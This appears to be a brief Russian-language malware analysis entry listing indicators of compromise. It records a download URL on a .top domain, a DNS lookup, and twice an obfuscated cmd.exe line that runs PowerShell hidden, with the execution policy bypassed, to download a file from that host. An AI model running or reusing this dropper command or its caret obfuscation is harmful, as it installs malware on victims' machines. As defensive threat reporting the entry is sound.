Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Pow^e^R^sh^EL^L^.Ex^e^ ^-E^XE^c^UtiO^n^pOl^Ic^Y bYpASS^ -n^OPRo^fIL^E ^-W^In^do^wS^tY^l^e^ Hi^DdEn^ ^(n^e^w^-oBject ^s^YS^Tem.n^ET^.^wEBclI^ent)^.^downl^o^a^Df^I^le^('http://www.z...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "Pow^e^R^sh^EL^L^.Ex^e^ ^-E^XE^c^UtiO^n^pOl^Ic^Y bYpASS^ -n^OPRo^fIL^E ^-W^In^do^wS^tY^l^e^ Hi^DdEn^ ^(n^e^w^-oBject ^s^YS^Tem.n^ET^.^wEBclI^ent)^.^downl^o^a^Df^I^le^('http://www.z...' (со скрытым окном)